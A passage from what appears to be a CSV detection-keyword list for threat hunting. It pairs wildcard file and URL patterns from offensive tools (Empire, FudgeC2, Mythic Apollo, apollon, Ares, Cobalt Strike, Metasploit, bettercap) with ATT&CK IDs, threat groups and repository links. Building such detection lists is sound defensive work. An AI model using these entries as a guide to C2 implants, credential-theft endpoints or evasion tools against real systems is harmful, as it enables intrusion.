T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/modules/credentials*?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/reporting/agent/initial?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - 
T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/reporting/msg/*?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/reporting/type/checkin?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/stagers/dll?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 
T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/stagers?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/users/1/disable?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/v1/campaign/*/implants/*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/api/v1/implants/*/execute*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and 
post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/api/v1/implants/*/responses*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/api/v2/starkiller*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" 
+"*/api0cradle/CVE-*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z"
+"*/Apollo.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*/Apollo.git*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*/Apollo/Agent/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*/ApolloInterop.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*/ApolloInterop/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/apollon-all-x64*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*/apollon-main.zip*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*/apollon-selective-x64*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*/ApolloTest.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/AppFiles/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation 
tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/aquasecurity/cloudsploit*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*/Ares.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*/ares.py *","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*/armitage.git*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*/arp_scanner.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/arp_spoof/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/artifactor.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/ase_docker/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/asprox.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/asprox.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/ASRenum.cpp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" +"*/ASRenum.cs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. 
